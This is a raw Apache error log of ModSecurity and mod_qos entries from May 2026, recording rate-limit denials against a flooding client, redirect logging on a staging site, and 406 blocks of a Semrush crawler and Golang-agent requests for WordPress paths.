[Tue May 26 20:00:07.381992 2026] [security2:error] [pid 93576:tid 93741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubWDRMqfxdEDkosz7jQAAAB0"]
[Tue May 26 20:00:07.386712 2026] [security2:error] [pid 106517:tid 106652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubYZZc2DoU1lPnP1YJwAAAIc"]
[Tue May 26 20:00:07.386795 2026] [security2:error] [pid 106517:tid 106654] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YVQAAAIk"]
[Tue May 26 20:00:07.388790 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubmDRMqfxdEDkosz7vwAAADg"]
[Tue May 26 20:00:07.389471 2026] [security2:error] [pid 106517:tid 106713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubYZZc2DoU1lPnP1YHQAAAMM"]
[Tue May 26 20:00:07.394867 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubmDRMqfxdEDkosz7wwAAAGc"]
[Tue May 26 20:00:07.409199 2026] [security2:error] [pid 106517:tid 106676] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YaAAAAJ8"]
[Tue May 26 20:00:07.409670 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubmDRMqfxdEDkosz7wAAAAFw"]
[Tue May 26 20:00:07.420590 2026] [security2:error] [pid 106517:tid 106712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YaQAAAMI"]
[Tue May 26 20:00:07.426800 2026] [security2:error] [pid 93576:tid 93743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubmDRMqfxdEDkosz7wgAAAB8"]
[Tue May 26 20:00:07.426980 2026] [security2:error] [pid 93576:tid 93726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubmDRMqfxdEDkosz7xAAAAA4"]
[Tue May 26 20:00:07.431720 2026] [security2:error] [pid 106517:tid 106725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YbAAAAM8"]
[Tue May 26 20:00:07.440598 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubmDRMqfxdEDkosz70gAAAF8"]
[Tue May 26 20:00:07.589578 2026] [qos:error] [pid 93576:tid 93820] [client 45.148.10.120:58014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWub2DRMqfxdEDkosz8RwAAAGw
[Tue May 26 20:00:07.590115 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWub2DRMqfxdEDkosz8SAAAADs
[Tue May 26 20:00:07.590189 2026] [qos:error] [pid 93576:tid 93838] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWub2DRMqfxdEDkosz8SQAAAH4
[Tue May 26 20:00:07.590880 2026] [qos:error] [pid 93576:tid 93826] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWub2DRMqfxdEDkosz8SgAAAHI
[Tue May 26 20:00:07.595439 2026] [qos:error] [pid 106517:tid 106671] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWub4ZZc2DoU1lPnP1Y3QAAAJo
[Tue May 26 20:00:07.597222 2026] [qos:error] [pid 93576:tid 93743] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWub2DRMqfxdEDkosz8UwAAAB8
[Tue May 26 20:00:07.600018 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWub2DRMqfxdEDkosz8VQAAACA
[Tue May 26 20:00:07.601513 2026] [qos:error] [pid 93576:tid 93769] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWub2DRMqfxdEDkosz8VgAAADk
[Tue May 26 20:00:07.601802 2026] [qos:error] [pid 93576:tid 93726] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWub2DRMqfxdEDkosz8WAAAAA4
[Tue May 26 20:00:07.601942 2026] [qos:error] [pid 106517:tid 106687] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWub4ZZc2DoU1lPnP1Y4AAAAKk
[Tue May 26 20:00:07.745433 2026] [qos:error] [pid 93576:tid 93826] [client 45.148.10.120:58064] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWub2DRMqfxdEDkosz8XQAAAHI
[Tue May 26 20:00:07.745897 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:58014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWub2DRMqfxdEDkosz8XgAAADA
[Tue May 26 20:00:07.787712 2026] [security2:error] [pid 93576:tid 93771] [client 85.208.96.198:26570] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahWub2DRMqfxdEDkosz8YAAAADs"]
[Tue May 26 20:00:07.787849 2026] [security2:error] [pid 93576:tid 93771] [client 85.208.96.198:26570] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahWub2DRMqfxdEDkosz8YAAAADs"]
[Tue May 26 20:00:07.952705 2026] [qos:error] [pid 93576:tid 93832] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWub2DRMqfxdEDkosz8YgAAAHg
[Tue May 26 20:00:07.985960 2026] [security2:error] [pid 93576:tid 93805] [client 103.163.220.16:36371] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/files/"] [unique_id "ahWub2DRMqfxdEDkosz8YwAAAF0"]
[Tue May 26 20:00:08.058670 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucGDRMqfxdEDkosz8ZgAAACA
[Tue May 26 20:00:08.120759 2026] [security2:error] [pid 106517:tid 106765] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWub4ZZc2DoU1lPnP1Y5QAAAPc"]
[Tue May 26 20:00:08.160657 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucGDRMqfxdEDkosz8bAAAADI
[Tue May 26 20:00:08.284445 2026] [security2:error] [pid 106517:tid 106769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YZwAAAPs"]
[Tue May 26 20:00:08.293230 2026] [security2:error] [pid 106517:tid 106732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YbgAAANY"]
[Tue May 26 20:00:08.294460 2026] [security2:error] [pid 106517:tid 106742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YWwAAAOA"]
[Tue May 26 20:00:08.301684 2026] [security2:error] [pid 106517:tid 106710] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YVgAAAMA"]
[Tue May 26 20:00:08.302501 2026] [security2:error] [pid 106517:tid 106703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YbQAAALk"]
[Tue May 26 20:00:08.307965 2026] [security2:error] [pid 106517:tid 106729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YbwAAANM"]
[Tue May 26 20:00:08.320942 2026] [security2:error] [pid 106517:tid 106656] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YfQAAAIs"]
[Tue May 26 20:00:08.322815 2026] [security2:error] [pid 106517:tid 106675] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YcQAAAJ4"]
[Tue May 26 20:00:08.333863 2026] [security2:error] [pid 106517:tid 106674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub4ZZc2DoU1lPnP1YrwAAAJ0"]
[Tue May 26 20:00:08.333949 2026] [security2:error] [pid 93576:tid 93816] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubmDRMqfxdEDkosz7-gAAAGg"]
[Tue May 26 20:00:08.336767 2026] [security2:error] [pid 106517:tid 106711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YgAAAAME"]
[Tue May 26 20:00:08.339059 2026] [security2:error] [pid 106517:tid 106760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YcwAAAPI"]
[Tue May 26 20:00:08.340639 2026] [security2:error] [pid 106517:tid 106701] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YgwAAALc"]
[Tue May 26 20:00:08.344289 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubmDRMqfxdEDkosz76QAAAAM"]
[Tue May 26 20:00:08.347467 2026] [security2:error] [pid 93576:tid 93748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubmDRMqfxdEDkosz72AAAACQ"]
[Tue May 26 20:00:08.352194 2026] [security2:error] [pid 106517:tid 106756] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YgQAAAO4"]
[Tue May 26 20:00:08.357858 2026] [security2:error] [pid 93576:tid 93775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub2DRMqfxdEDkosz8HAAAAD8"]
[Tue May 26 20:00:08.362444 2026] [security2:error] [pid 106517:tid 106702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub4ZZc2DoU1lPnP1YtQAAALg"]
[Tue May 26 20:00:08.372827 2026] [security2:error] [pid 106517:tid 106774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YhgAAAQA"]
[Tue May 26 20:00:08.378950 2026] [security2:error] [pid 106517:tid 106773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YjwAAAP8"]
[Tue May 26 20:00:08.380548 2026] [security2:error] [pid 106517:tid 106718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub4ZZc2DoU1lPnP1YsAAAAMg"]
[Tue May 26 20:00:08.382651 2026] [security2:error] [pid 106517:tid 106706] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub4ZZc2DoU1lPnP1YrQAAALw"]
[Tue May 26 20:00:08.397975 2026] [security2:error] [pid 106517:tid 106761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub4ZZc2DoU1lPnP1YtgAAAPM"]
[Tue May 26 20:00:08.413226 2026] [security2:error] [pid 93576:tid 93776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub2DRMqfxdEDkosz8GgAAAEA"]
[Tue May 26 20:00:08.418964 2026] [security2:error] [pid 93576:tid 93763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub2DRMqfxdEDkosz8KgAAADM"]
[Tue May 26 20:00:08.440688 2026] [security2:error] [pid 106517:tid 106724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub4ZZc2DoU1lPnP1YtwAAAM4"]
[Tue May 26 20:00:08.447734 2026] [security2:error] [pid 93576:tid 93831] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub2DRMqfxdEDkosz8HQAAAHc"]
[Tue May 26 20:00:08.449363 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub2DRMqfxdEDkosz8KwAAACs"]
[Tue May 26 20:00:08.473018 2026] [security2:error] [pid 106517:tid 106658] [client 103.163.220.31:40843] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/theme-compat/"] [unique_id "ahWucIZZc2DoU1lPnP1ZCAAAAI0"]
[Tue May 26 20:00:08.623417 2026] [qos:error] [pid 93576:tid 93727] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucGDRMqfxdEDkosz8lAAAAA8
[Tue May 26 20:00:08.623752 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucGDRMqfxdEDkosz8lQAAAAU
[Tue May 26 20:00:08.624806 2026] [qos:error] [pid 106517:tid 106709] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucIZZc2DoU1lPnP1ZOwAAAL8
[Tue May 26 20:00:08.625739 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucGDRMqfxdEDkosz8mAAAACQ
[Tue May 26 20:00:08.625751 2026] [qos:error] [pid 106517:tid 106704] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWucIZZc2DoU1lPnP1ZPAAAALo
[Tue May 26 20:00:08.626673 2026] [qos:error] [pid 106517:tid 106740] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWucIZZc2DoU1lPnP1ZPgAAAN4
[Tue May 26 20:00:08.628771 2026] [qos:error] [pid 93576:tid 93738] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWucGDRMqfxdEDkosz8mwAAABo
[Tue May 26 20:00:08.629000 2026] [qos:error] [pid 106517:tid 106740] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWucIZZc2DoU1lPnP1ZQQAAAN4
[Tue May 26 20:00:08.631103 2026] [qos:error] [pid 106517:tid 106724] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWucIZZc2DoU1lPnP1ZRAAAAM4
[Tue May 26 20:00:08.631368 2026] [qos:error] [pid 106517:tid 106740] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWucIZZc2DoU1lPnP1ZRQAAAN4
[Tue May 26 20:00:08.633160 2026] [qos:error] [pid 106517:tid 106723] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWucIZZc2DoU1lPnP1ZRgAAAM0
[Tue May 26 20:00:08.873246 2026] [qos:error] [pid 106517:tid 106687] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucIZZc2DoU1lPnP1ZVQAAAKk
[Tue May 26 20:00:08.873288 2026] [qos:error] [pid 93576:tid 93779] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWucGDRMqfxdEDkosz8nQAAAEM
[Tue May 26 20:00:08.874170 2026] [qos:error] [pid 93576:tid 93805] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucGDRMqfxdEDkosz8ngAAAF0
[Tue May 26 20:00:08.874291 2026] [qos:error] [pid 93576:tid 93735] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucGDRMqfxdEDkosz8nwAAABc
[Tue May 26 20:00:08.875003 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucGDRMqfxdEDkosz8oAAAACA
[Tue May 26 20:00:08.878112 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucGDRMqfxdEDkosz8oQAAABM
[Tue May 26 20:00:08.878681 2026] [qos:error] [pid 106517:tid 106658] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWucIZZc2DoU1lPnP1ZWAAAAI0
[Tue May 26 20:00:08.879800 2026] [qos:error] [pid 106517:tid 106730] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWucIZZc2DoU1lPnP1ZWQAAANQ
[Tue May 26 20:00:08.883139 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucGDRMqfxdEDkosz8pAAAAEA
[Tue May 26 20:00:08.888232 2026] [qos:error] [pid 106517:tid 106759] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWucIZZc2DoU1lPnP1ZXAAAAPE
[Tue May 26 20:00:08.888600 2026] [qos:error] [pid 106517:tid 106680] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWucIZZc2DoU1lPnP1ZXQAAAKI
[Tue May 26 20:00:08.987421 2026] [security2:error] [pid 106517:tid 106732] [client 103.163.220.53:60607] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/404.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZYgAAANY"]
[Tue May 26 20:00:09.027305 2026] [qos:error] [pid 106517:tid 106772] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucYZZc2DoU1lPnP1ZZQAAAP4
